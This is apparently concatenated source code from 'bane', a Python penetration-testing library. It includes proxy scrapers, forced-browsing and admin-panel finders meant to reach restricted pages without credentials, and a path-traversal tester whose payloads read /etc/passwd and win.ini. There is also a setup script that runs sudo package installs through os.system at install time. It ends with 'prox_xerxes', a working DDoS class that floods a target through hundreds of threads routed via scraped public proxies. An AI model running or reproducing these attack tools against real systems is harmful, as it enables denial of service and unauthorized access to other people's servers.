            print("[+]Checking: {}".format(u))
        c = requests.get(u, timeout=timeout).text
        soup = BeautifulSoup(c, "html.parser")
        y = soup.find_all("tr")
        for x in y:
            if "Socks5" in str(x):
                try:
                    x = str(x)
                    ip = x.split("</td>")[0].split("=")[0]
                    ip = ip.split("<tr><td>")[1].split("=")[0]
                    p = x.split("</td><td>")[1].split("=")[0]
                    p = p.split("</td>")[0].split("=")[0]
                    pr = ip + ":" + p
                    if pr not in s5l:
                        s5l.append(pr)
                        if len(s5l) == count:
                            break
                except:
                    pass
    except:
        pass
    """
 ur=["https://list.proxylistplus.com/Socks-List-1"," https://list.proxylistplus.com/Socks-List-2"]
 for u in ur:
  if len(s5l)==count:
   break
  try:
   if logs==True:
    print("[+]Checking: {}".format(u))
   c=requests.get(u,timeout=timeout).text
   s = BeautifulSoup(c,"html.parser")
   y=s.find_all('tr')
   for x in y:
    try:
     z = x.find_all('td')
     if "strong" in str(z):
      pass 
     else:
      if "Socks5" in str(x):
       ip= str(z[1]).split('<td>')[1].split('=')[0]
       ip=ip.split('</td>')[0].split('=')[0]
       p= str(z[2]).split('<td>')[1].split('=')[0]
       p=p.split('</td>')[0].split('=')[0]
       pr=ip+':'+p
       if pr not in s5l:
        s5l.append(pr)
        if len(s5l)==count:
          break
    except Exception as e:
     pass
  except Exception as e:
   pass
 """
    return s5l


def socks4(logs=True, count=30, timeout=15):
    """
    this function gather up hundreds of SOCKS4 proxies from many sources.
    those proxies are recommended to be used as reliable ones all the time.
    the function takes an argument which is the number of proxies to return (*args) , in case of no argument given it will
    return the whole list,and another argument (logs) which is set by default to True so you can see the process of the function, you can turn
    off the the typing if you set it to: False.

    usage:

    >>>import bane
    >>>bane.socks4()

    >>>bane.socks4(50)"""
    s4l = []
    u = "https://www.socks-proxy.net/"
    try:
        if logs == True:
            print("[+]Checking: {}".format(u))
        c = requests.get(u, timeout=timeout).text
        soup = BeautifulSoup(c, "html.parser")
        y = soup.find_all("tr")
        for x in y:
            if "Socks4" in str(x):
                try:
                    x = str(x)
                    ip = x.split("</td>")[0].split("=")[0]
                    ip = ip.split("<tr><td>")[1].split("=")[0]
                    p = x.split("</td><td>")[1].split("=")[0]
                    p = p.split("</td>")[0].split("=")[0]
                    pr = ip + ":" + p
                    if pr not in s4l:
                        s4l.append(pr)
                        if len(s4l) == count:
                            break
                except Exception as e:
                    pass
    except Exception as e:
        pass
    """ur=["https://list.proxylistplus.com/Socks-List-1"," https://list.proxylistplus.com/Socks-List-2"]
 for u in ur:
  if len(s4l)==count:
   break
  try:
   if logs==True:
    print("[+]Checking: {}".format(u))
   c=requests.get(u,timeout=timeout).text
   s = BeautifulSoup(c,"html.parser")
   y=s.find_all('tr')
   for x in y:
    try:
     z = x.find_all('td')
     if "strong" in str(z):
      pass 
     else:
      if "Socks4" in str(x):
       ip= str(z[1]).split('<td>')[1].split('=')[0]
       ip=ip.split('</td>')[0].split('=')[0]
       p= str(z[2]).split('<td>')[1].split('=')[0]
       p=p.split('</td>')[0].split('=')[0]
       pr=ip+':'+p
       if pr not in s4l:
        s4l.append(pr)
        if len(s4l)==count:
          break
    except Exception as e:
     pass
  except Exception as e:
   pass
 """
    return s4l

'''



from bane.bruteforce.utils import *


def access(u, timeout=10, user_agent=None, cookie=None, bypass=False, proxy=None,headers={}):
    if bypass == True:
        u += "#"
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    try:
        r = requests.get(
            u,
            headers={"User-Agent": random.choice(ua)},
            allow_redirects=False,
            proxies=proxy,
            timeout=timeout,
            verify=False,
        )
        if r.status_code == requests.codes.ok:
            if ("Uncaught exception" not in r.text) or ("404 Not Found" not in r.text):
                return True
    except Exception as e:
        pass
    return False



class force_browsing:
    __slots__ = ["stop", "finish", "result", "logs"]

    def __init__(
        self,
        u,
        timeout=10,
        threads_daemon=True,
        logs=True,
        ext="php",
        user_agent=None,
        cookie=None,
        proxy=None,
        proxies=None,
        headers={}
    ):
        """
        this function is using "Forced Browsing" technique which is aim to access restricted areas without providing any credentials!!!
        it is used here to gain access to admin control panel by trying different possible combinations of links with the given URL.
        it's possible to do that and this a proof of concept that unserured cpanels with lack of right sessions configurations can be
        accessed just by guessing the right links :)

        the function takes those arguments:

        u: the targeted link which should be leading to the control panel, example:
        http://www.example.com/admin/login.php
        you have to delete 'login.php' and insert the rest of the link in the function like this:

        >>>import bane
        >>>bane.force_browsing('http://www.example.com/admin/')

        then the function will try to find possible accesseble links:

        http://www.example.com/admin/edit.php
        http://www.example.com/admin/news.php
        http://www.example.com/admin/home.php

        timeout: (set by default to 10) timeout flag for the request
        logs: (set by default to: True) showing the process of the attack, you can turn it off by setting it to: False
        returning: (set by default to: False) return a list of the accessible link(s), to make the function return the list, set to: True
        mapping: (set by default to: True) find all possible links, to make stop if it has found 1 link just set it to: False
        ext: (set by default to: "php") it helps you to find links with the given extention, cuurentky it supports only 3 extentions: "php", "asp" and "aspx"( any other extention won't be used)."""
        self.stop = False
        self.finish = False
        self.result = {}
        self.logs = logs
        t = threading.Thread(
            target=self.crack,
            args=(
                u,
                timeout,
                logs,
                ext,
                user_agent,
                cookie,
                proxy,
                proxies,
                headers,
            ),
        )
        t.daemon = threads_daemon
        t.start()

    def crack(
        self,
        u,
        timeout=10,
        logs=True,
        ext="php",
        user_agent=None,
        cookie=None,
        proxy=None,
        proxies=None,
    ):
        l = []
        if u[len(u) - 1] == "/":
            u = u[0 : len(u) - 1]
        for x in innerl:
            if self.stop == True:
                break
            g = u + x + "." + ext
            if self.logs == True:
                print("[*]Trying:", g)
            try:
                if proxy:
                    proxy = proxy
                if proxies:
                    proxy=random.choice(proxies)
                if user_agent:
                    us = user_agent
                else:
                    us = random.choice(ua)
                h = access(g, user_agent=us, cookie=cookie, proxy=proxy)
            except KeyboardInterrupt:
                break
            if h == True:
                l.append(g)
                if self.logs == True:
                    print("[+]FOUND!!!")
            else:
                if self.logs == True:
                    print("[-]Failed")
        self.result = {u: l}
        self.finish = True

    def done(self):
        return self.finish




from bane.cryptographers.utils import *

def base64_encode(w, encode=None):
    if w:
        if encode:
            w.encode(encode)
        """
   function to return base64 encoded string
  """
        return base64.b64encode(w)


def base64_decode(w, encode=None):
    if w:
        if encode:
            w.encode(encode)
        """
   function to return base64 decoded string
  """
        return base64.b64decode(w)



def base64_encode_file(f):
    if f:
        with open(f, "rb") as f:
            w = f.read()
        f.close()
        return base64_encode(w)


def base64_decode_file(f):
    if f:
        with open(f, "rb") as f:
            w = f.read()
        f.close()
        return base64_decode(w)



from bane.scanners.vulnerabilities.utils import *
from bane.scanners.vulnerabilities.vulner_search import vulners_search

def scan_backend_technology(u, proxy=None, timeout=10, user_agent=None, cookie=None, logs=True,request_headers=None,headers={}):
    domain=u.split('://')[1].split('/')[0].split(':')[0]
    root_domain=extract_root_domain(domain)
    ip=socket.gethostbyname(domain.split(':')[0])
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update(headers)
    try:
        if request_headers==None:
            r = requests.get(
                u, headers=heads, proxies=proxy, timeout=timeout, verify=False
            ).headers
        else:
            r=request_headers
        server=r.get('Server','')
        try:
            server_os=[x for x in server.split() if x.startswith('(')==True][0].replace('(','').replace(')','')
        except:
            server_os=''
        backend=r.get('X-Powered-By','')
        if logs==True:
            print("Site info:\n\n\tURL: {}\n\tDomain: {}\n\tRoot domain: {}\n\tIP: {}\n\tServer: {}\n\tOS: {}\n\tBackend technology: {}\n".format(u,domain,root_domain,ip,server,server_os,backend))
        backend_technology_exploits={}
        if backend!='':
            bk=[]
            for back in backend.split():
                if logs==True:
                    print('[i] looking for exploits for : {}\n'.format(back))
                if '/' not in back:
                    if logs==True:
                        print('\t[-] unknown version\n')
                else:
                    bk=vulners_search(back.split('/')[0].lower(),version=back.split('/')[1],proxy=proxy)
                for x in bk:
                    for i in ['cpe', 'cpe23', 'cwe', 'affectedSoftware']:
                        try:
                            del x[i]
                        except:
                            pass
                backend_technology_exploits.update({back:bk})
                if logs==True:
                    if len(bk)==0:
                        print('\t[-] none was found')
                    else:
                        for x in bk:
                            print("\tTitle : {}\n\tDescription: {}\n\tLink: {}".format(x['title'],x['description'],x['href']))
                            print()
        server_exploits={}
        if server!='':
            for sv in server.split():
                if sv.startswith('(')==False:
                    sv_e=[]
                    if logs==True:
                        print('[i] looking for exploits for : {}\n'.format(sv))
                    if '/' in sv:
                        sv_e=vulners_search(sv.split('/')[0].lower(),version=sv.split('/')[1],proxy=proxy)
                    else:
                        if logs==True:
                            print('\t[-] unknown version\n')
                    for x in sv_e:
                        for i in ['cpe', 'cpe23', 'cwe', 'affectedSoftware']:
                            try:
                                del x[i]
                            except:
                                pass
                    server_exploits.update({sv:sv_e})
                    if logs==True:
                        if len(sv_e)==0:
                            print('\t[-] none was found')
                        else:
                            for x in sv_e:
                                print("\tTitle : {}\n\tDescription: {}\n\tLink: {}".format(x['title'],x['description'],x['href']))
                                print()        
    except Exception as e:
        return {}
    return {'server_exploits':server_exploits,'backend_technology_exploits':backend_technology_exploits}





#for windows you need to download: winpcap: http://www.win10pcap.org/download/
import sys,setuptools,os,subprocess,platform
with open("README.md", "r") as fh:
    long_description = fh.read()
termux=False

if os.path.isdir('/home/')==True:
 if not os.getenv("SUDO_USER"):
  print('\n\nYou didn\'t the installation run with root privilege !\nYou will have to install the following packages manually: sshpass , nodejs\n\n\n')
 if os.getenv("SUDO_USER"):
  pm="apt"
  for x in ["apt","yum","pacman","dnf","zypper","brew"]:
   if subprocess.call(["which", x], stdout=subprocess.PIPE, stderr=subprocess.PIPE)==0:
    pm=x
    break
  os.system('sudo '+pm+' install sshpass -y')
  os.system('sudo '+pm+' install nodejs -y')

adr=False
if os.path.isdir('/data/data')==True:
    adr=True
if os.path.isdir('/data/data/com.termux/')==True:
    termux=True
    os.system('pkg install openssh -y')
    os.system('pkg install sshpass -y')
    os.system('pkg install nodejs -y')
if termux==False:
   if  sys.version_info < (3,0):
    os.system('pip uninstall dnspython -y')
    os.system('pip install dnspython')
   else:
    os.system('pip3 uninstall dnspython -y')
    os.system('pip3 install dnspython')

#protobuf==3.6.1

if  sys.version_info < (3,0):
 req=["furl","future","xtelnet","requests","PySocks","bs4","pymysql==0.9.3","scapy==2.4.0","stem","cfscrape","google","colorama","dnspython"]
 if adr==True:
    req=["furl","future","xtelnet","requests","PySocks","bs4","pymysql==0.9.3","cfscrape","scapy==2.4.0","google","colorama","dnspython"]
 if termux==True:
    req=["furl","future","xtelnet","requests","PySocks","bs4","pymysql==0.9.3","scapy==2.4.0","cfscrape","google","colorama","dnspython"]
else:
 req=["furl","future","xtelnet","requests","PySocks","bs4","pymysql","kamene==0.32","stem","cfscrape","google","colorama","dnspython"]
 if adr==True:
    req=["furl","future","xtelnet","requests","PySocks","bs4","pymysql","cfscrape","kamene==0.32","google","colorama","dnspython"]
 if termux==True:
    req=["furl","future","xtelnet","requests","PySocks","bs4","pymysql","kamene==0.32","cfscrape","google","colorama","dnspython"]
if (sys.platform == "win32") or( sys.platform == "win64"):
 req+=["win_inet_pton"]

req+=['jsbeautifier','tldextract']
if platform.system()=='Java':
    if "stem" in req:
        req.remove("stem")
    if "scapy" in req:
      req.remove('scapy')
    if "jsbeautifier" in req:
      req.remove('jsbeautifier')


setuptools.setup(
    name="bane",
    version="4.9.7",
    author="AlaBouali",
    author_email="trap.leader.123@gmail.com",
    description="cyber security library, penetration testing module",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/AlaBouali/bane",
    python_requires=">=2.7",
    install_requires=req,
    packages=setuptools.find_packages(),
    license="MIT License",
    classifiers=[
        "Programming Language :: Python",
        "License :: OSI Approved :: MIT License ",
    ],
)



from bane.scanners.vulnerabilities.utils import *

def sniffable_links(u, proxy=None, timeout=10, user_agent=None, cookie=None,content=None,logs=True,request_headers=None,headers={}):
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update(headers)
    vul=[]
    try:
        if content==None:
            r=requests.get(u,headers=heads,timeout=timeout,verify=False,proxies=proxy)
            for x in r.headers:
                    if x.lower().strip() == "strict-transport-security":
                        if logs == True:
                            print("\n[-] Not vulnerable: Strict-Transport-Security is set")
                        return []
            soup = BeautifulSoup(r.content, 'html.parser')
        else:
            soup = BeautifulSoup(content, 'html.parser')
            if request_headers!=None:
                for x in request_headers:
                    if x.lower().strip() == "strict-transport-security":
                        if logs == True:
                            print("\n[-] Not vulnerable: Strict-Transport-Security is set")
                        return []
        if u:
                parsed_url = urlparse(u)
                if parsed_url.netloc == urlparse(u).netloc:
                    if parsed_url.scheme != 'https' and parsed_url.geturl().startswith('//')==False:
                        parsed_url=parsed_url.geturl()
                        if parsed_url not in vul:
                            vul.append(parsed_url)
                            if logs==True:
                                print('\t[+] Vulnerable : {}'.format(parsed_url))
        media_elements=soup.find_all(['img', 'audio', 'video', 'source','embed', 'script', 'link', 'a'])
        for element in media_elements:
            src_or_href = element.get('src') or element.get('href')
            if src_or_href:
                parsed_url = urlparse(urljoin(u,src_or_href))
                if parsed_url.netloc == urlparse(u).netloc:
                    if parsed_url.scheme != 'https' and parsed_url.geturl().startswith('//')==False:
                        parsed_url=parsed_url.geturl()
                        if parsed_url not in vul:
                            vul.append(parsed_url)
                            if logs==True:
                                print('\t[+] Vulnerable : {}'.format(parsed_url))
    except Exception as ex:
        return vul
    return vul
    

def interceptable_links(
    u, 
    max_pages=5,
    proxy=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    content=None,
    logs=True,
    pages=[],
    headers={}
):
    l=[]
    if pages==[]:
        pages=spider_url(u,cookie=cookie,max_pages=max_pages,timeout=timeout,user_agent=user_agent,proxy=proxy,headers={})
    for x in pages:
        if logs==True:
            print('\n\nPage: {}\n'.format(x))
        result=sniffable_links(x,
                        proxy=proxy,
                        timeout=timeout,
                        user_agent=user_agent, 
                        cookie=cookie,
                        content=content,
                        logs=logs,
                        headers=headers
                        )
        if logs==True:
            for r in result:
                print(r)
        l.append({'page':x,'result':result})
    return  [x for x in l if x['result']!=[]]




from bane.bruteforce.utils import *

class filemanager_finder:
    __slots__ = ["logs", "stop", "finish", "result"]

    def __init__(
        self,
        u,
        logs=True,
        threads_daemon=True,
        user_agent=None,
        cookie=None,
        timeout=10,
        proxy=None,
        proxies=None,
        headers={}
    ):
        """
        u: the link: http://www.example.com
        logs: (set by default to True) the show the process and requests
        mapping: (set by default to: False) if it is set to True, it will stop the prcess when it finds the link, else: it continue for more
        possible links
        returning: (set by default to: False) if you want it to return a list of possibly accesseble links to be used in your scripts set it to: True
        timeout: (set by default to 10) timeout flag for the requests

        usage:

        >>>import bane
        >>>url='http://www.example.com/'
        >>>bane.filemanager_finder(url)
        """
        self.logs = logs
        self.stop = False
        self.finish = False
        self.result = {}
        t = threading.Thread(
            target=self.crack,
            args=(
                u,
                user_agent,
                cookie,
                timeout,
                proxy,
                proxies,
                headers,
            ),
        )
        t.daemon = threads_daemon
        t.start()

    def crack(self, u, user_agent, cookie, timeout, proxy, proxies,headers):
        for i in manager:
            if self.stop == True:
                self.finish = True
                break
            if user_agent:
                us = user_agent
            else:
                us = random.choice(ua)
            hed = {"User-Agent": us}
            if cookie:
                hed.update({"Cookie": cookie})
            hed.update(headers)
            try:
                if u[len(u) - 1] == "/":
                    u = u[0 : len(u) - 1]
                g = u + i
                r = requests.get(
                    g,
                    headers=hed,
                    allow_redirects=False,
                    proxies=proxy,
                    timeout=timeout,
                    verify=False,
                )
                if r.status_code == requests.codes.ok:
                    if (
                        ("Uncaught exception" not in r.text)
                        and ("404 Not Found" not in r.text)
                        and ("could not be found" not in r.text)
                    ):
                        self.finish = True
                        if self.logs == True:
                            sys.stdout.write(
                                "\rStats: {}/{} | Found: {}  ".format(
                                    manager.index(g), len(manager), self.finish
                                )
                            )
                            sys.stdout.flush()
                        self.result.update({u: g})
                        break
                    else:
                        if self.logs == True:
                            sys.stdout.write(
                                "\rStats: {}/{} | Found: {}  ".format(
                                    manager.index(g), len(manager), self.finish
                                )
                            )
                            sys.stdout.flush()
                else:
                    if self.logs == True:
                        sys.stdout.write(
                            "\rStats: {}/{} | Found: {}  ".format(
                                manager.index(g), len(manager), self.finish
                            )
                        )
                        sys.stdout.flush()
            except KeyboardInterrupt:
                break
            except Exception as e:
                pass
        self.finish = True

    def done(self):
        return self.finish



from bane.scanners.vulnerabilities.utils import *

def springboot_actuator(u,user_agent=None,cookie=None,proxy=None,timeout=None,path='/actuator',headers={}):
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    try:
        return requests.get(
            u + path,
            headers=hed,
            proxies=proxy,
            timeout=timeout,
            verify=False,
        ).json()
    except:
        pass



# coding: utf-8
# why did i remove the SQL-Is part? well compared to other scanning functions they are immature. Besides SQLMap is a better option to test against SQL-Is :)
from bane.scanners.vulnerabilities.adb_exploit import *
from bane.scanners.vulnerabilities.backend_technologies import *
from bane.scanners.vulnerabilities.clickjacking import *
from bane.scanners.vulnerabilities.cors_misconfigurations import *
from bane.scanners.vulnerabilities.crlf_injection import *
from bane.scanners.vulnerabilities.csrf import *
from bane.scanners.vulnerabilities.exposed_env import *
from bane.scanners.vulnerabilities.exposed_git import *
from bane.scanners.vulnerabilities.exposed_telnet import *
from bane.scanners.vulnerabilities.file_upload import *
from bane.scanners.vulnerabilities.open_redirect import *
from bane.scanners.vulnerabilities.path_traversal import *
from bane.scanners.vulnerabilities.php_unit_exploit import *
from bane.scanners.vulnerabilities.rce import *
from bane.scanners.vulnerabilities.shodan_report import *
from bane.scanners.vulnerabilities.sniffable_links import *
from bane.scanners.vulnerabilities.springboot_actuator import *
from bane.scanners.vulnerabilities.ssrf import *
from bane.scanners.vulnerabilities.ssti import *
from bane.scanners.vulnerabilities.vulner_search import *
from bane.scanners.vulnerabilities.xss import *



from bane.scanners.vulnerabilities.utils import *




def path_traversal_check(
    u,
    php_wrapper="file",
    linux_file=0,
    null_byte=False,
    bypass=False,
    target_os="linux",
    proxy=None,
    proxies=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    headers={}
):
    """
    this function is for FI vulnerability test using a link"""
    linux_files = ["{}proc{}version", "{}etc{}passwd"]
    if proxies:
        proxy = random.choice(proxies)
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update(
        {
            "Referer": u,
            "Origin": u.split("://")[0] + "://" + u.split("://")[1].split("/")[0],
        }
    )
    heads.update(headers)
    if "=" not in u:
        return (False, "")
    else:
        if target_os.lower() == "linux":
            l = linux_files[linux_file]
        else:
            l = "c:{}windows{}win.ini"
        if bypass == True:
            l = l.format("./" * random.randint(1, 5), "./" * random.randint(1, 5))
        else:
            l = l.format("/" * random.randint(1, 5), "/" * random.randint(1, 5))
        if php_wrapper:
            l = (
                "".join(random.choice((str.upper, str.lower))(c) for c in php_wrapper)
                + "://"
                + l
            )
        if null_byte == True:
            l += "%00"
        try:
            r = requests.get(
                u.format(l), headers=heads, proxies=proxy, timeout=timeout, verify=False
            )
            if (
                (
                    len(
                        re.findall(
                            r"[a-zA-Z0-9_]*:[a-zA-Z0-9_]*:[\d]*:[\d]*:[a-zA-Z0-9_]*:/",
                            r.text,
                        )
                    )
                    > 0
                )
                or (
                    all(
                        x in r.text
                        for x in [
                            "; for 16-bit app support",
                            "[fonts]",
                            "[extensions]",
                            "[mci extensions]",
                            "[files]",
                            "[Mail]",
                        ]
                    )
                    == True
                )
                or (all(x in r.text for x in ["Linux version", "(gcc version"]) == True)
            ):
                return (True, r.url)
        except Exception as e:
            pass
    return (False, "")


def path_traversal_urls(
    u,
    null_byte=False,
    bypass=False,
    target_os="linux",
    php_wrapper="file",
    proxy=None,
    proxies=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    headers={}
):
    res = []
    if u.split("?")[0][-1] != "/" and "." not in u.split("?")[0].rsplit("/", 1)[-1]:
        u = u.replace("?", "/?")
    a = crawl(u, proxy=proxy, timeout=timeout, cookie=cookie, user_agent=user_agent)
    l = []
    d = a.values()
    for x in d:
        if len(x[3]) > 0:
            l.append(x)
    o = []
    for x in l:
        ur = x[1]
        if ur.split("?")[0] not in o:
            o.append(ur.split("?")[0])
            if (
                ur.split("?")[0][-1] != "/"
                and "." not in ur.split("?")[0].rsplit("/", 1)[-1]
            ):
                ur = ur.replace("?", "/?")
            for y in x[3]:
                if valid_parameter(y[1]) == True:
                    trgt = ur.replace(y[0] + "=" + y[1], y[0] + "={}")
                    q = path_traversal_check(
                        trgt,
                        null_byte=null_byte,
                        bypass=bypass,
                        linux_file=0,
                        target_os="linux",
                        php_wrapper=php_wrapper,
                        proxy=proxy,
                        proxies=proxies,
                        timeout=timeout,
                        cookie=cookie,
                        user_agent=user_agent,
                        headers=headers
                    )
                    if q[0] == True:
                        if q[1] not in res:
                            res.append(q[1])
                    else:
                        q = path_traversal_check(
                            trgt,
                            null_byte=null_byte,
                            bypass=bypass,
                            linux_file=1,
                            target_os="linux",
                            php_wrapper=php_wrapper,
                            proxy=proxy,
                            proxies=proxies,
                            timeout=timeout,
                            cookie=cookie,
                            user_agent=user_agent,
                            headers=headers
                        )
                        if q[0] == True:
                            if q[1] not in res:
                                res.append(q[1])
                        else:
                            q = path_traversal_check(
                                trgt,
                                null_byte=null_byte,
                                bypass=bypass,
                                php_wrapper=php_wrapper,
                                proxy=proxy,
                                proxies=proxies,
                                timeout=timeout,
                                cookie=cookie,
                                user_agent=user_agent,
                                target_os="windows",
                                headers=headers
                            )
                            if q[0] == True:
                                if q[1] not in res:
                                    res.append(q[1])
    return res

def path_traversal(
    u,
    max_pages=5,
    logs=True,
    null_byte=False,
    bypass=False,
    target_os="linux",
    php_wrapper=None,#"file",
    proxy=None,
    proxies=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    pages=[],
    headers={}
):
    l=[]
    if pages==[]:
        pages=spider_url(u,cookie=cookie,max_pages=max_pages,timeout=timeout,user_agent=user_agent,proxy=proxy)
    for x in pages:
        if logs==True:
            print('\n\nPage: {}\n'.format(x))
        result=path_traversal_urls(x,
                            null_byte=null_byte,
                            bypass=bypass,
                            target_os=target_os,
                            php_wrapper=php_wrapper,
                            proxy=proxy,
                            proxies=proxies,
                            timeout=timeout,
                            user_agent=user_agent,
                            cookie=cookie,
                            headers=headers)
        if logs==True:
            for r in result:
                print(r)
        l.append({'page':x,'result':result})
    return  [x for x in l if x['result']!=[]]




from googlesearch import search

def google_dorking(
    q,
    max_results=100,
    language="en",
    start_from=1,
    stop_on=None,
    top_level_domain="com",
    pause=2,
):
    j = []
    j += search(
        q,
        num=max_results,
        lang=language,
        start=start_from,
        stop=stop_on,
        tld="com",
        pause=2,
    )
    l = []
    for x in j:
        if x not in l:
            l.append(x)
    return l




import requests, urllib, socket, random, time, re, threading, sys, json, os, xtelnet
import bs4
from bs4 import BeautifulSoup
from bane.common.payloads import *
import tldextract
try:
    if sys.version_info < (3, 0):
        from scapy.config import conf

        conf.ipv6_enabled = False
        from scapy.all import *
    else:
        from kamene.config import conf

        conf.ipv6_enabled = False
        from kamene.all import IP,TCP,sr
except:
    pass
if os.path.isdir("/data/data/com.termux/") == False:
    import dns.resolver


def extract_root_domain(subdomain):
    extracted = tldextract.extract(subdomain)
    if extracted.suffix.count('.') > 1:
        root_domain = "{}.{}".format(extracted.domain,extracted.suffix)
    else:
        root_domain = extracted.registered_domain
    return root_domain




def remove_html_tags(text):
    """Remove html tags from a string"""
    clean = re.compile("<.*?>")
    return re.sub(clean, "", text)



def get_banner(u, p=23, timeout=3, payload=None):
    try:
        return xtelnet.get_banner(u, p=p, timeout=timeout, payload=payload)
    except:
        return None







import requests, random, smtplib, telnetlib, sys, os, hashlib, base64, subprocess, time, xtelnet, os, threading  # ,requests_ntlm
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from ftplib import FTP
from ..common.payloads import *

if os.path.isdir("/data/data") == True:
    adr = True
if os.path.isdir("/data/data/com.termux/") == True:
    termux = True
import pymysql
from ..utils.pager import *
from ..scanners.cms.wp import wpadmin
from ..cryptographers.hasher import *
from ..utils.pager import *



def process_threaded(a, check_interval=0.1):
    while True:
        try:
            if a.done() == True:
                try:
                    return a.result
                except:
                    pass
                try:
                    return a.counter
                except:
                    return
            time.sleep(check_interval)
        except KeyboardInterrupt:
            a.stop = True
            try:
                return a.result
            except:
                pass
            try:
                return a.counter
            except:
                pass



from bane.bruteforce.utils import *

class admin_panel_finder:
    __slots__ = ["stop", "finish", "result", "logs"]

    def done(self):
        return self.finish

    """
   this function use a list of possible admin panel links with different extensions: php, asp, aspx, js, /, cfm, cgi, brf and html.
   
   ext: (set by default to: 'php') to define the link's extention.

   usage:

  >>>import bane
  >>>bane.admin_panel_finder('http://www.example.com',ext='php',timeout=7)

  >>>bane.admin_panel_finder('http://www.example.com',ext='aspx',timeout=5)
 """

    def __init__(
        self,
        u,
        logs=True, 
        threads_daemon=True,
        user_agent=None,
        cookie=None,
        ext="php",
        timeout=10,
        proxy=None,
        proxies=None,
        headers={}
    ):
        self.logs = logs
        self.stop = False
        self.finish = False
        self.result = {}
        t = threading.Thread(
            target=self.crack,
            args=(
                u,
                timeout,
                logs,
                ext,
                user_agent,
                cookie,
                proxy,
                proxies,
                headers,
            ),
        )
        t.daemon = threads_daemon
        t.start()

    def crack(
        self,
        u,
        timeout,
        logs,
        ext,
        user_agent,
        cookie,
        proxy,
        proxies,
        headers
    ):
        links = []
        ext = ext.strip()
        if ext.lower() == "php":
            links = phpl
        elif ext.lower() == "asp":
            links = aspl
        elif ext.lower() == "aspx":
            links = aspxl
        elif ext.lower() == "js":
            links = jsl
        elif ext == "/":
            links = slashl
        elif ext.lower() == "cfm":
            links = cfml
        elif ext.lower() == "cgi":
            links = cgil
        elif ext.lower() == "brf":
            links = brfl
        elif ext.lower() == "html":
            links = htmll
        k = []
        for i in links:
            if self.stop == True:
                break
            try:
                if proxies:
                    proxy = random.choice(proxies)
                if user_agent:
                    us = user_agent
                else:
                    us = random.choice(ua)
                hed = {"User-Agent": us}
                if cookie:
                    hed.update({"Cookie": cookie})
                hed.update(headers)
                if u[len(u) - 1] == "/":
                    u = u[0 : len(u) - 1]
                g = u + i
                if logs == True:
                    print("[*]Trying:", g)
                r = requests.get(
                    g,
                    headers=hed,
                    allow_redirects=False,
                    proxies=proxy,
                    timeout=timeout,
                    verify=False,
                )
                if r.status_code == requests.codes.ok:
                    if logs == True:
                        print("[+]FOUND!!!")
                    k.append(g)
                else:
                    if logs == True:
                        print("[-]failed")
            except KeyboardInterrupt:
                break
            except Exception as e:
                if logs == True:
                    print("[-]Failed")
        self.result = {u: k}
        self.finish = True




from bane.ddos.utils import *

class prox_xerxes(DDoS_Class):
    def __init__(
        self,
        u,
        scraping_timeout=15,
        p=80,
        threads_daemon=True,
        threads=700,
        timeout=5,
        http_list=None,
        socks4_list=None,
        socks5_list=None,
        duration=60,
        logs=False,
    ):
        self.httplist = http_list
        if not self.httplist and self.httplist != []:
            self.httplist = proxyscrape(timeout=scraping_timeout)
        self.socks4list = socks4_list
        if not self.socks4list and self.socks4list != []:
            self.socks4list = proxyscrape(protocol='socks4',timeout=scraping_timeout)
        self.socks5list = socks5_list
        if not self.socks5list and self.socks5list != []:
            self.socks5list = proxyscrape(protocol='socks5',timeout=scraping_timeout)
        self.stop = False
        self.counter = 0
        self.start = time.time()
        self.target = u
        self.duration = duration
        self.port = p
        self.timeout = timeout
        self.logs = logs
        self.id_key = 0
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
                self.id_key += 1
            except:
                pass

    def attack(self):
        try:
            x = self.id_key
            time.sleep(1)
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    bot_type = []
                    if len(self.httplist) > 0:
                        bot_type.append("h")
                    if len(self.socks4list) > 0:
                        bot_type.append("s4")
                    if len(self.socks5list) > 0:
                        bot_type.append("s5")
                    z = random.choice(bot_type)
                    if z == "h":
                        line = random.choice(self.httplist)
                    elif z == "s4":
                        line = random.choice(self.socks4list)
                    elif z == "s5":
                        line = random.choice(self.socks5list)
                    ipp = line.split(":")[0].split("=")[0]
                    pp = line.split(":")[1].split("=")[0]
                    s = socks.socksocket()
                    if z == "h":
                        s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
                    elif z == "s4":
                        s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
                    elif z == "s5":
                        s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
                    if z == "h":
                        s.settimeout(self.timeout)
                    s.connect((self.target, self.port))
                    self.counter += 1
                    while True:
                        if (
                            int(time.time() - self.start) >= self.duration
                        ):  # this is a safety mechanism so the attack won't run forever
                            break
                        if self.stop == True:
                            break
                        try:
                            s.send("\x00".encode("utf-8"))  # send NULL character
                            if self.logs == True:
                                sys.stdout.write(
                                    "\r[{}: Voly sent-->{}]     ".format(x, ipp)
                                )
                                sys.stdout.flush()
                        except:
                            break
                        time.sleep(0.2)
                except:
                    pass
                self.counter -= 1
                time.sleep(0.3)
            self.kill()
        except:
            pass
